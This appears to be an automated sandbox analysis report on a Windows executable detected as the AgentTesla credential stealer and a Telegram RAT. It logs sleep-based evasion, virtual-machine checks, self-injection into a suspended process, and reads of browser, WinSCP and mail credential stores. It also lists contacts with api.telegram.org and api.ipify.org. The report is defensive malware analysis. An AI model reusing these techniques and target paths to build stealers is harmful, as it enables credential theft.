Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597310 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597202 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596874 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595999 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595889 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595780 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595452 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594578 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Window / User API: threadDelayed 2126 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Window / User API: threadDelayed 7733 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5008 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5480 Thread sleep count: 2126 > 30 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5480 Thread sleep count: 7733 > 30 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599426s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599202s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -599093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598651s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598543s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598404s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598296s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -598077s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597857s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597748s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597421s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597310s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597202s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -597093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596874s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -596109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595999s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595889s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595780s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595452s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -595015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -594906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -594796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe TID: 5564 Thread sleep time: -594578s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599426 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599202 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598651 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598543 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598404 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598296 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 598077 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597968 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597857 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597748 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597640 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597421 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597310 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597202 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596874 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595999 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595889 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595780 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595452 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Thread delayed: delay time: 594578 Jump to behavior
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BrYTwivmCI
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4446439995.0000000001139000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Memory written: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process created: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe "C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4448567496.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4448567496.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 1864, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 1864, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4448567496.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 1864, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4448567496.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4448567496.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 1864, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: z34PDnVzyEItkXaInw.exe PID: 1864, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
172.67.74.152
 api.ipify.org United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
api.ipify.org 172.67.74.152 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high